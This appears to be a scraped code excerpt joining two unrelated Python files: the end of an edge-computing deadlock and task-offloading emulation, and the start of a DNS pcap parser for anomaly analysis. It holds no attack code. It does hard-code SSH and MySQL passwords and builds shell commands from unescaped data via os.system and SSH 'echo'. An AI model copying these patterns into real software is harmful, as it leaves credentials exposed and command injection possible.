# Add this process to safe sequence.
safe_seq[count] = processes[t]
count += 1
# Mark this p as finished
finish[t] = 1
found = True
# If we could not find a next process
# in safe sequence.
if not found:
print("System is not in safe state")
a = list(set(processes) - set(safe_seq) - set(offload))
_max = np.array([0, 0, 0])
n = {}
for i in a:
n[i] = sum(allocation[i[:2]])
_max = max(n, key=n.get)
print('work: ', work, 'need: ', _need[_max[:2]])
offload.append(_max)
work = np.array(work) + np.array(allocation[_max[:2]])
count += 1
# Mark this p as finished
finish[processes.index(_max)] = 1
found = True
# If system is in safe state then
# safe sequence will be as below
if len(offload) > 0:
safe_seq = safe_seq[:safe_seq.index(0)]
print('offloading tasks: ', offload)
cooperative_mec(offload)
deadlock[0] += 1
print("System is in safe state.",
"\nSafe sequence is: ", end=" ")
print('safe seq: ', safe_seq)
return safe_seq
def get_exec_seq(pro):
# Number of processes
p = len(pro)
processes = ['{}_{}'.format(pro[i], i) for i in range(len(pro))]
# Available instances of resources
avail = [6, 5, 5]
n_need = {i: _need[i[:2]] for i in processes}
# print('need', n_need)
# Resources allocated to processes
allot = {i: allocation[i[:2]] for i in processes}
# return execution sequence
return is_safe(processes, avail, n_need, allot, p)
def calc_wait_time(list_seq):
pre = 0
time_dic = {}
for i in list_seq:
j = i.split('_')[0]
time_dic[i] = round(t_time[j][0] + pre, 3)
pre += t_time[j][0]
# broadcast waiting time = total waiting time / 2 (the full average waiting time might be too tight)
w_send = round(time_dic[list(time_dic.keys())[-1]] / 2, 3)
send_message('wt {} {}'.format(ip_address(), str(w_send))) # Broadcasting waiting time to cooperative MECs
return time_dic
timed_out_tasks = 0
def compare_local_mec(list_seq):
global received_time, timed_out_tasks
execute_mec = []
execute_locally = []
diff = time.time() - received_time.pop(0)
checking_times = {}
for i in list_seq:
t_time[i.split('_')[0]][1] -= diff
# if t_time[i.split('_')[0]][1] < 0:
# _client.publish(i.split('_')[0].split('.')[2], str({i.split('_')[0]: get_time() + ['local']}), )
# timed_out_tasks += 1
if t_time[i.split('_')[0]][1] > list_seq[i]:
execute_locally.append(i)
else:
execute_mec.append(i)
checking_times[i] = {'Latency': t_time[i.split('_')[0]][1], 'Expected_exec_time': list_seq[i]}
print('Execution time comparison:= ', checking_times)
return execute_mec, execute_locally
def calculate_mov_avg(ma1, a1):
if ma1 in mec_waiting_time:
_count = len(mec_waiting_time[ma1])
avg1 = mec_waiting_time[ma1][-1]
else:
_count = 0
avg1 = 0
_count += 1
avg1 = ((_count - 1) * avg1 + a1) / _count
# ma1.append(avg1) #cumulative average formula
# μ_n=((n-1) μ_(n-1) + x_n)/n
return round(avg1, 4)
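# Example for calculate_mov_avg() above: if mec_waiting_time already holds
# [2.0] for a host and a new sample a1=4.0 arrives, the function returns
# ((2 - 1) * 2.0 + 4.0) / 2 = 3.0.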
def send_message(mg):
_multicast_group = ('224.3.29.71', 10000)
try:
# Send data to the multicast group
if mg == 'hello':
smg = mg + ' ' + str([get_hostname(), ip_address()])
sock1.sendto(str.encode(smg), _multicast_group)
print('\nHello message sent')
else:
sock1.sendto(str.encode(mg), _multicast_group)
except Exception as e:
print(e)
def get_hostname():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def receive_message(stop): # used for multi-cast message exchange among MEC
global hosts
while True:
if stop():
print('Stopped: receive_message()')
break
else:
data, address = sock1.recvfrom(1024)
_d = data.decode()
if _d[:5] == 'hello':
_data = ast.literal_eval(_d[6:])
hosts[_data[0]] = _data[1]
if _data[1] != host_ip:
mec_rtt[_data[1]] = []
elif (_d[:6] == 'update') and (discovering == 0):
hosts = ast.literal_eval(_d[7:])
# print('received: ', hosts)
for i in hosts:
if i != host_ip:
mec_rtt[i] = []
elif _d[:2] == 'wt':
split_data = _d.split()
if split_data[1] != host_ip:
w_time = calculate_mov_avg(split_data[1], float(split_data[2]) + get_rtt(
address[0]))  # calculate moving average of MEC wait time => w_time = wait time + rtt
if split_data[1] in mec_waiting_time:
mec_waiting_time[split_data[1]].append(w_time)
else:
mec_waiting_time[split_data[1]] = [w_time]
def mec_comparison():
# returns min average waiting for all mecs
if len(mec_waiting_time) == 0:
return 0
min_mec = {i: mec_waiting_time[i][-1] for i in mec_waiting_time}
min_wt = min(min_mec, key=min_mec.get)
return min_wt
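# cooperative_mec() decides where each missed/offloaded task goes: if no MEC
# waiting times are known it publishes the task to the cloud broker topic;
# otherwise it sends it to the MEC with the smallest waiting time when that
# wait beats the task's latency budget (or when the MEC RTT beats the cloud
# RTT and the resource demand fits), and falls back to the cloud otherwise.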
def cooperative_mec(mec_list):
global _off_cloud
global _off_mec
global task_id, task_record
for i in mec_list:
_host = mec_comparison()
if _host == 0:
# send_cloud([i.split('_')[0], t_time[i.split('_')[0]][0]]) # [task_id,exec_time]
_send_task = f"{i.split('_')[0]}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[i.split('_')[0]][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# cloud_register[i.split('_')[0].split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
else:
j = i.split('_')[0]
_max = np.array([6, 5, 5])
send = 'false'
if np.greater_equal(_max, _need[j[:2]]).all():
send = 'true'
# CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN LATENCY
if mec_waiting_time[_host][-1] < t_time[j][1] and send == 'true':
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
elif send == 'true' and (get_rtt(_host) < get_rtt(cloud_ip)):
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
else:
_send_task = f"{j}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[j][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# send_cloud([j, t_time[j][0]]) # # [task_id,exec_time]
# cloud_register[j.split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
outward_mec = 0
offload_check = []
def execute_re_offloaded_task(offloaded_task):
global outward_mec, offload_check
exec_list = get_exec_seq(offloaded_task[0])
if len(exec_list) != len(offloaded_task[0]):
print('\n\n', '@ ' * 50)
print('exec: ', exec_list, 'off: ', offloaded_task[0])
print('\n\n', '@ ' * 50)
offload_check.append((exec_list, offloaded_task[0]))
outward_mec += len(exec_list)
for i in exec_list: # i = 't1.1.2.3*1_3'
j = i.split('_')[0]
time.sleep(offloaded_task[1][j] / 2)
# print('j task: ', j)
send_offloaded_task_mec('{} {}'.format(j.split('.')[1], i.split('*')[0]))
clients_record = {}
def count_task_sent(task):
global clients_record
c_id = task.split('.')[2]
if c_id in clients_record:
clients_record[c_id] += 1
else:
clients_record[c_id] = 1
def execute(local):
print('\nExecuting :', local)
for i in local:
j = i.split('_')[0]
_t = t_time[j][0] / 2
time.sleep(_t)
print('#{}'.format(local.index(i) + 1), ' Executed: ', i)
_client.publish(j.split('.')[2], str({j: get_time() + ['local']}), )
count_task_sent(j)
# if j.split('.')[1] != node_id:
# send_offloaded_task_mec('{} {}'.format(j.split('.')[1], j))
# outward_mec += 1
# elif j.split('.')[1] == node_id:
# # send_client({j: get_time()}, send_back_host)
# _client.publish(j.split('.')[2], str({j: get_time()+['local']}), )
# count_task_sent(j)
# else:
# print('else execute: ', j)
print('============== EXECUTION DONE ===============')
cooperate = {'mec': 0, 'cloud': 0}
def receive_offloaded_task_mec(stop): # run as a thread
global _inward_mec
global t_track
while True:
if stop():
print('Stopped: receive_offloaded_task_mec()')
break
else:
data, address = sock2.recvfrom(1024)
if len(data.decode()) > 0:
da = data.decode().split(' ')
if (address[0] not in ip_set) and (da[0] == node_id): # send back to client
# send_client({da[1]: get_time()}, offload_register[da[1]]) # send back to client
if da[1] in task_record:
del task_record[da[1]]
task_new = '.'.join(da[1].split('.')[:-1])
_client.publish(da[1].split('.')[2], str({task_new: get_time() + ['mec']}), )
count_task_sent(da[1])
cooperate['mec'] += 1
else:
print('*' * 30 + f'\n{da[1]} Not in Task Record\n' + '*' * 30)
elif (address[0] not in ip_set) and (da[0] == 'ex') and (da[1] == node_id):
_received = ast.literal_eval(da[2] + da[3])
shared_resource_lock.acquire()
task = _received[0] + '*{}'.format(t_track)
reoffload_list[0].append(task)
reoffload_list[1][task] = _received[1]
shared_resource_lock.release()
t_track += 1
_inward_mec += 1
def call_execute_re_offload(stop):
global reoffload_list
while True:
if stop():
print('Stopped: call_execute_re_offload()')
break
else:
if len(reoffload_list[0]) == 1:
t = reoffload_list[0][-1]
time.sleep(reoffload_list[1][t] / 2)
shared_resource_lock.acquire()
reoffload_list[0].remove(t)
del reoffload_list[1][t]
shared_resource_lock.release()
send_offloaded_task_mec('{} {}'.format(t.split('.')[1], t.split('*')[0]))
elif len(reoffload_list[0]) > 1:
o = reoffload_list.copy()
execute_re_offloaded_task(o)
for i in o[0]:
shared_resource_lock.acquire()
reoffload_list[0].remove(i)
del reoffload_list[1][i]
shared_resource_lock.release()
def send_email(msg, send_path):
try:
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.ehlo()
server.login(config.email_address, config.password)
subject = 'Deadlock results edf+bankers {} {}'.format(get_hostname(), send_path)
# msg = 'Attendance done for {}'.format(_timer)
_message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
server.sendmail(config.email_address, config.send_email, _message)
server.quit()
print("Email sent!")
except Exception as e:
print(e)
def send_offloaded_task_mec(msg):
_multicast_group = ('224.5.5.55', 20000)
try:
sock2.sendto(str.encode(msg), _multicast_group)
except Exception as e:
print(e)
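# Derives a zero-padded, three-character node id from the last octet of an IPv4 address,
# e.g. mec_id('192.168.1.7') -> '007' and mec_id('192.168.1.45') -> '045'.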
def mec_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
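# Appends each result line to /home/mec/result/data.py on the collector host over SSH
# (paramiko) using the hard-coded 'mec' credentials.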
def send_result(host_, data):
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(host_, port, un, pw)
for i in data:
cmd = ('echo "{}" >> /home/mec/result/data.py'.format(i)) # task share : host ip task
stdin, stdout, stderr = c.exec_command(cmd)
c.close()
except Exception as e:
print(e)
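# Serialises all experiment counters (waiting times, RTTs, CPU samples, offload counts,
# deadlock and memory records, ...) as Python assignments, writes them under data/raw/,
# copies the file to the collector host with scp, mirrors the lines over SSH via
# send_result(), e-mails a summary, and finally flushes any task still left in
# task_record back to its client.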
def save_and_send(send_path):
_id_ = get_hostname()[-1]
result = f"\nwt{_id_}_3_{mec_no} = {mec_waiting_time} " \
f"\nrtt{_id_}_3_{mec_no} = {mec_rtt} \ncpu{_id_}_3_{mec_no} = {_cpu} " \
f"\noff_mec{_id_}_3_{mec_no} = {_off_mec} " \
f"\noff_cloud{_id_}_3_{mec_no} = {_off_cloud} " \
f"\ninward_mec{_id_}_3_{mec_no} = {_inward_mec}" \
f"\nloc{_id_}_3_{mec_no} = {_loc} " \
f"\ndeadlock{_id_}_3_{mec_no} = {deadlock} \nmemory{_id_}_3_{mec_no} = {memory}" \
f"\ntask_received{_id_}_3_{mec_no} = {total_received_task} \nsent_t{_id_}_3_{mec_no} = {clients_record}" \
f"\ncooperate{_id_}_3_{mec_no} = {cooperate} \ntask_record{_id_}_3_{mec_no} = {task_record}" \
f"\noutward_mec{_id_}_3_{mec_no} = {outward_mec}" \
f"\noffload_check{_id_}_3_{mec_no} = {offload_check}" \
f"\ntimed_out_tasks{_id_}_3_{mec_no} = {timed_out_tasks}\n"
list_result = [
f"\nwt{_id_}_3_{mec_no} = {mec_waiting_time} ",
f"\nrtt{_id_}_3_{mec_no} = {mec_rtt} \ncpu{_id_}_3_{mec_no} = {_cpu} ",
f"\noff_mec{_id_}_3_{mec_no} = {_off_mec} \noff_cloud{_id_}_3_{mec_no} = {_off_cloud} ",
f"\ninward_mec{_id_}_3_{mec_no} = {_inward_mec}",
f"\nloc{_id_}_3_{mec_no} = {_loc} ",
f"\ndeadlock{_id_}_3_{mec_no} = {deadlock} \nmemory{_id_}_3_{mec_no} = {memory}",
f"\ntask_received{_id_}_3_{mec_no} = {total_received_task} \nsent_t{_id_}_3_{mec_no} = {clients_record}",
f"\ncooperate{_id_}_3_{mec_no} = {cooperate} \ntask_record{_id_}_3_{mec_no} = {task_record} ",
f"\noutward_mec{_id_}_3_{mec_no} = {outward_mec}",
f"\noffload_check{_id_}_3_{mec_no} = {offload_check}",
f"\ntimed_out_tasks{_id_}_3_{mec_no} = {timed_out_tasks}"
]
path_ = 'data/raw/'
if os.path.exists(path_):
cmd = f"echo '' > {path_}{_id_}_3_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_3_{mec_no}datap.py"
os.system(cmd)
else:
os.mkdir(path_)
cmd = f"echo '' > {path_}{_id_}_3_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_3_{mec_no}datap.py"
os.system(cmd)
file_ = open(f'{path_}{_id_}_3_{mec_no}datap.py', 'w')
for i in list_result:
cmd = f'echo "{i}" >> {path_}{_id_}_3_{mec_no}datal.py'
file_.write(i)
os.system(cmd)
file_.close()
sp.run(
["scp", f"{path_}{_id_}_3_{mec_no}datap.py", f"mec@{hosts['osboxes-0']}:{send_path}"])
send_result(hosts['osboxes-0'], list_result)
send_email(result, send_path)
if len(task_record) > 0:
for _task_ in task_record:
task_new = '.'.join(_task_.split('.')[:-1])
_client.publish(task_new.split('.')[2], str({task_new: get_time() + [task_record[_task_]]}), )
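# Resets every module-level counter and data structure to its initial value so that the
# emulation can be run again from a clean state without restarting the process.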
def terminate_process():
global prev_t, _loc, _off_mec, _off_cloud, _inward_mec, outward_mec, deadlock, memory, mec_waiting_time, mec_rtt
global offload_register, reoffload_list, discovering, test, _time, _pos, received_task_queue, received_time
global cloud_register, t_track, task_record, task_id, cooperate, clients_record, offload_check
global timed_out_tasks, total_received_task, _cpu
# reinitialize #
_cpu = [] # cpu plot list
prev_t = 0 # variable for cpu util
_off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec
_off_cloud = 0 # used to keep a count of tasks offloaded to cloud
_loc = 0 # used to keep a count of tasks executed locally
_inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec
outward_mec = 0 # keeps count of tasks sent back to another mec after executing
deadlock = [1] # keeps count of how many deadlocks have been resolved
memory = []
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
mec_rtt = {} # {ip: [RTT]}
offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload
reoffload_list = [[], {}] # [[task_list], {task: wait_time}] => records tasks re-offloaded to this MEC for execution
discovering = 0 # if discovering == 0 update host
test = []
_time = []
_pos = 0
received_task_queue = [] # [[(task_list,wait_time), host_ip], ....]
received_time = []
cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud
t_track = 1
task_record = {} # keeps record of task reoffloaded
task_id = 0 # id for each task reoffloaded
cooperate = {'mec': 0, 'cloud': 0}
clients_record = {}
offload_check = [] # reset to the same empty-list form used at start-up
timed_out_tasks = 0
total_received_task = 0
time.sleep(1)
run = 1 # tell agents child when to stop
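# Main control loop: starts the receiver/broker threads, then repeatedly pops a batch of
# tasks off received_task_queue, runs EDF scheduling with the deadlock-avoidance safe
# sequence (get_exec_seq(edf())), splits the result into local and cooperative
# executions, and keeps going until `run` is cleared or the user interrupts.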
def start_loop():
global _loc
global tasks
global t_time
global node_id
global run
print('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n')
node_id = mec_id(ip_address())
# print('node id: ', node_id)
func_to_thread = [receive_message, receive_offloaded_task_mec, call_execute_re_offload, connect_to_broker]
threads_ = []
stop = False
for i in func_to_thread:
threads_.append(Thread(target=i, args=(lambda: stop,)))
threads_[-1].daemon = True
threads_[-1].start()
print('algorithm is starting....')
while run == 1:
try:
if len(received_task_queue) > 0:
info = received_task_queue.pop(0)
tasks, t_time = info
print('EDF List of Processes: ', tasks, '\n')
print('\n========= Running Deadlock Algorithm ===========')
list_seq = get_exec_seq(edf())
if len(list_seq) > 0: # do only when there is a task in safe sequence
wait_list = calc_wait_time(list_seq)
print('\nWaiting Time List: ', wait_list)
compare_result = compare_local_mec(wait_list)
print('\nExecute Locally: ', compare_result[1])
_loc += len(compare_result[1]) # total number of tasks to be executed locally
print('\nExecute in MEC: ', compare_result[0])
if len(compare_result[0]) > 0:
print('\nSending to cooperative platform')
cooperative_mec(compare_result[0])
execute(compare_result[1])
generate_results()
else:
send_message(str('wt {} 0.0'.format(ip_address())))
time.sleep(0.4)
except KeyboardInterrupt:
print('\nProgramme Terminated')
stop = True # signal the worker threads to exit so the joins below can return
for th in threads_:
th.join()
time.sleep(1)
print('done')
# os.system('kill -9 {}'.format(os.getpid()))
break
print('algo stopped!')
run = 1
stop = True
time.sleep(20)
for th in threads_:
th.join()
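# Entry point called by the controlling agent: records the MEC topology (hosts, cloud,
# broker), joins the discovery and offloading multicast groups, runs the main loop, then
# saves the results and reinitialises the module state for the next experiment.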
def run_me(hosts_, mec_no_, cloud_ip_, send_path, broker_ip_): # call this from agent
global discovering
global hosts
global mec_no
global host_ip
global cloud_ip
global my_algo
global broker_ip
print('mec ip: ', ip_address())
my_algo = psutil.Process()
discovering_group()
offloading_group()
host_ip_set()
hosts = hosts_
mec_no = mec_no_
cloud_ip = cloud_ip_
broker_ip = broker_ip_
host_ip = ip_address()
print('MEC Details: ', hosts)
discovering = 1
time.sleep(2)
for host in hosts:
if hosts[host] != host_ip:
mec_rtt[hosts[host]] = []
start_loop()
print('saving data')
save_and_send(send_path)
print('Terminating process')
terminate_process()
|
PcapParser.py
|
# Copyright (C) 2016 Manmeet Singh, Maninder Singh, Sanmeet kour
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
#
# Display Parser for DNS Query , DNS Response and DNS Failed Lookups
#
# !python2
import datetime
import socket
import sys
import ipaddr
import time
import dpkt
import thread
from threading import Thread
# try:
# import mysql.connector
# except:
# print("MySQl Not found")
import struct
import getopt
from whitelist import checkWhiteList
from DnsAnalyser import Network
from DnsAnalyser import map_analyse_data
syntax = "PcapParse.py -v -c 10000 -m < mode_val e.g. 0,1,2> -f <filename>"
# print messages 0- OFF , 1 -ON
VERBOSE = 1
# 0- Parse & display only
# 1- parse,display,store,
# 2 - parse & store don't display,
# 3 - CSV Write
# MODE = 0
# count of unknown responses /Previous , Query, Response
# CSV Wrapper
# TODO : batch row insert instead of single row write using some cache mechanism
class CSVWrapper:
def __init__(self, filename):
# pipeline == 1: records are streamed straight to DnsAnalyser and no CSV files are created; pipeline == 0: CSV files are written
self.pipeline = 0
self.my_req_cache_list = []
self.my_res_cache_list = []
self.h = Network(filename)
if self.pipeline:
return
else:
self.req_outfile = open(filename + "_req.csv", "wb")
self.res_outfile = open(filename + "_res.csv", "wb")
self.log_outfile = open(filename + "_log.csv", "wb")
def write_request(self, tid, reqIP, reqURL, nbrDomainToken, querytype, urlLength,dns_server_ip, timestamp):
if self.pipeline:
self.h.process_record(str(tid), str(reqIP), str(reqURL), str(nbrDomainToken), str(querytype), str(urlLength), str(timestamp), str(dns_server_ip))
return
if len(self.my_req_cache_list) != 3:
self.my_req_cache_list.append(str(tid) + "," + str(reqIP) + "," + str(reqURL).encode('ascii', 'ignore') + "," + str(nbrDomainToken) + "," + str(querytype) + "," + str(urlLength) + "," + str(timestamp) + "," + dns_server_ip + "\n")
else:
self.req_outfile.writelines(self.my_req_cache_list)
self.my_req_cache_list[0:3] = []
self.my_req_cache_list.append(str(tid) + "," + str(reqIP) + "," + str(reqURL) + "," + str(nbrDomainToken) + "," + str(querytype) + "," + str(urlLength) + "," + str(timestamp) + "," + dns_server_ip + "\n")
def write_response(self, tid, reqIP, reqURL, reqType, rescode, ttl, resolvedIp, receivedtimestamp):
if self.pipeline:
self.h.process_response(str(tid), str(reqIP), str(reqURL), str(rescode), str(ttl), str(resolvedIp), str(receivedtimestamp))
return
if len(self.my_res_cache_list) != 3:
self.my_res_cache_list.append(str(tid) + "," + str(reqIP) + "," + str(reqURL) + "," + str(reqType) + "," + str(rescode) + "," + str(ttl) + "," + str(resolvedIp) + "," + str(receivedtimestamp)+ "\n" )
else:
self.res_outfile.writelines(self.my_res_cache_list)
self.my_res_cache_list[0:3] = []
self.my_res_cache_list.append(str(tid) + "," + str(reqIP) + "," + str(reqURL) + "," + str(reqType) + "," + str(rescode) + "," + str(ttl) + "," + str(resolvedIp) + "," + str(receivedtimestamp) + "\n")
def write_log(self, sno, key, val):
if self.pipeline:
return
self.log_outfile.write(sno + "," + key + "," + val + "\n")
def close(self):
if self.pipeline:
self.h.find_anomaly()
return
self.req_outfile.close()
self.res_outfile.close()
self.log_outfile.close()
# MySQL Wrapper
class MySqlWrapper:
def __init__(self):
try:
self.cnx = mysql.connector.connect(user='root', password='mysql', host='127.0.0.1', database='bot')
except:
print("MySQL Failed")
def select(self, sql):
try:
cursor = self.cnx.cursor()
cursor.execute(sql)
results = cursor.fetchall()
if cursor.rowcount < 1:
return 0, 0
else :
return 1, results
except:
return 0, 0
def insert(self, sql):
try:
cursor = self.cnx.cursor()
cursor.execute(sql)
self.cnx.commit()
if cursor.rowcount < 1:
cursor.close()
return 0
else:
cursor.close()
return 1
except:
cursor.close()
return -1
def update(self, sql):
try:
cursor = self.cnx.cursor()
cursor.execute(sql)
self.cnx.commit()
# print cursor.rowcount
if cursor.rowcount < 1:
cursor.close()
return 0
else:
cursor.close()
return 1
except:
cursor.close()
return -1
# Pcap parser class
class PcapParser:
# Constructor
def __init__(self, _count, _mode, _filename, _verbose):
self.count = _count
self.filename = _filename
self.mode = _mode
self.verbose = _verbose
self.dnsUnknownResponseCount = 0
self.dnsQueryCount = 0
self.dnsResponseCount = 0
self.dnsFailedCount = 0
self.dnsPktCount = 0
self.csv_obj = CSVWrapper(_filename)
self.progress_index = 0
self.f = open(self.filename, 'rb')
self.pcap = dpkt.pcap.Reader(self.f)
self.c_name = ""
# default count of packets to parse
self.MAX_PKT_COUNT = 1000
self.start = datetime.datetime.now()
# Insert or update existing query with response code and other fields
def update_response(self, tid, reqIP, reqURL, reqType, rescode, ttl, resolvedIp, receivedtimestamp):
try:
if reqIP == "172.31.1.6" or reqIP == "172.31.3.121":
return 0
if self.mode == 3:
if checkWhiteList(reqURL) != 1:
self.csv_obj.write_response(tid, reqIP, reqURL, reqType, rescode, ttl, resolvedIp, receivedtimestamp)
return 0
except:
print (str(self.dnsPktCount) + " Error: update_response")
return 0
# disconnect from server
# check DNS packet or not
def check_dns_traffic(self):
# make sure we are dealing with IP traffic
try:
self.eth = dpkt.ethernet.Ethernet(self.buf)
except:
return 0
if self.eth.type != 2048:
return 0
# make sure we are dealing with UDP protocol
try:
self.ip = self.eth.data
except:
return 0
if self.ip.p != 17:
return 0
# filter on UDP assigned ports for DNS
try:
self.udp = self.ip.data
except:
return 0
if self.udp.sport != 53 and self.udp.dport != 53:
return 0
return 1
# wrapper to parse Request
def parse_request(self):
self.dnsQueryCount += 1
# Default Gateway and dns server skip query
if socket.inet_ntoa(self.ip.src) == '172.31.1.6' or socket.inet_ntoa(self.ip.src) == '172.31.3.121':
return
for self.query in self.dns.qd:
# If URL in white list skip the packet
# if MODE != 3:
if checkWhiteList(self.query.name) == 1:
if self.verbose == 1 and self.mode < 2:
print ("White list Presence : " + self.query.name)
continue
elif self.query.type != 0: # DNS_A
try:
# pt= query.name.split('.')
# ip_add = struct.unpack("!L", self.ip.src)[0]
if self.mode == 3:
self.csv_obj.write_request(self.dns.id, socket.inet_ntoa(self.ip.src),
self.query.name, self.query.name.count('.') + 1,
self.query.type, len(self.query.name),socket.inet_ntoa(self.ip.dst),
str(datetime.datetime.utcfromtimestamp(self.ts).strftime(
"%d/%m/%y %H:%M:%S")))
elif self.mode == 9:
print(self.ts, str(datetime.datetime.fromtimestamp(self.ts).strftime("%H:%M:%S")))
elif self.mode < 2:
print (self.dnsPktCount, '\t', self.dns.id, '\tQuery\t\t', socket.inet_ntoa(self.ip.src),
' \t ',
self.query.name, '\t', self.query.type, '\t', len(self.query.name), '\t',
self.query.name.count('.') + 1, '\t',
str(datetime.datetime.utcfromtimestamp(self.ts).strftime("%H:%M:%S")))
elif self.mode == 0 or self.mode == 1:
if self.checkRequest(self.dns.id, socket.inet_ntoa(self.ip.src), self.query.name,
self.query.type) == 0:
self.insertNewRequest(self.dns.id, socket.inet_ntoa(self.ip.src), self.query.name,
self.query.name.count('.') + 1, self.query.type, len(self.query.name), str(
datetime.datetime.utcfromtimestamp(self.ts).strftime("%d/%m/%y %H:%M:%S")))
else:
if VERBOSE:
print (str(self.dnsPktCount) + "\t" + "exist")
except:
continue
else:
print (self.dnsPktCount, '\t', 'Unhandled Request')
# wrapper to parse Answer, Authority (NS) and Additional response records
def parse_response(self):
if self.answer.type == dpkt.dns.DNS_A: # DNS_A
try:
ipadd = struct.unpack("!L", self.answer.rdata)[0] # resolved self.ip
dstIP = struct.unpack("!L", self.ip.dst)[0] # Destination self.ip
if self.mode < 2:
print (self.dnsPktCount, '\t', self.dns.id, '\tResponse\t', self.answer.name, '->',
socket.inet_ntoa(self.answer.rdata), '\t', self.answer.ttl, '\t', self.answer.type, '\t',
socket.inet_ntoa(self.ip.dst), '\t',
str(datetime.datetime.utcfromtimestamp(self.ts).strftime("%H:%M:%S")))
if self.mode > 0:
if self.c_name == "":
self.update_response(self.dns.id, socket.inet_ntoa(self.ip.dst), self.answer.name,
self.answer.type, self.dns.rcode, self.answer.ttl,
socket.inet_ntoa(self.answer.rdata), str(
datetime.datetime.utcfromtimestamp(self.ts).strftime("%d/%m/%y %H:%M:%S")))
else:
self.update_response(self.dns.id, socket.inet_ntoa(self.ip.dst), self.c_name, self.answer.type,
self.dns.rcode, self.answer.ttl, socket.inet_ntoa(self.answer.rdata), str(
datetime.datetime.utcfromtimestamp(self.ts).strftime("%d/%m/%y %H:%M:%S")))
except:
if self.mode < 3:
print(self.dnsPktCount, '\t', "Unhandled Record Response type : " + str(self.answer.type))
elif self.answer.type == dpkt.dns.DNS_CNAME: # DNS_CNAME
try:
self.c_name = self.answer.name # remember the CNAME owner so following A records report the queried name
if self.mode < 2:
print (self.dnsPktCount, '\t', self.dns.id, '\tResponse\t', self.answer.name, '->',
self.answer.cname, '\t',
self.answer.ttl, '\t', self.answer.type, '\t',
socket.inet_ntoa(self.ip.dst), '\t',
str(datetime.datetime.utcfromtimestamp(self.ts).strftime("%H:%M:%S"))
)
except:
print (self.dnsPktCount, '\t', "Failed")
elif self.answer.type == dpkt.dns.DNS_MX: # DNS_MX
try:
ipadd = struct.unpack("!L", self.answer.rdata)[0] # resolved self.ip
dstIP = struct.unpack("!L", self.ip.dst)[0] # Destination self.ip
if self.mode < 2:
print (self.dnsPktCount, '\t', self.dns.id, '\tResponse\t', self.answer.name, '->',
socket.inet_ntoa(self.answer.rdata), '\t', self.answer.ttl, '\t', self.answer.type, '\t',
socket.inet_ntoa(self.ip.dst), '\t',
str(datetime.datetime.utcfromtimestamp(self.ts).strftime("%H:%M:%S")))
if self.mode > 0:
if self.c_name == "":
self.update_response(self.dns.id, socket.inet_ntoa(self.ip.dst), self.answer.name,
self.answer.type,
self.dns.rcode, self.answer.ttl, socket.inet_ntoa(self.answer.rdata), str(
datetime.datetime.utcfromtimestamp(self.ts).strftime("%d/%m/%y %H:%M:%S")))
else:
self.update_response(self.dns.id, socket.inet_ntoa(self.ip.dst), self.c_name,
self.answer.type,
self.dns.rcode, self.answer.ttl, socket.inet_ntoa(self.answer.rdata), str(
datetime.datetime.utcfromtimestamp(self.ts).strftime("%d/%m/%y %H:%M:%S")))
except:
if self.mode < 3:
print(self.dnsPktCount, '\t', "Unhandled Record Response type : " + str(self.answer.type))
elif self.answer.type == dpkt.dns.DNS_NS: # DNS_NS
try:
# ipadd = struct.unpack("!L", self.answer.rdata)[0] # resolved self.ip
dstIP = struct.unpack("!L", self.ip.dst)[0] # Destination self.ip
if self.mode < 2:
print (self.dnsPktCount, '\t', self.dns.id, '\tResponse\t', self.answer.name, '->',
self.answer.nsname, '\t', self.answer.ttl, '\t', self.answer.type, '\t',
socket.inet_ntoa(self.ip.dst), '\t',
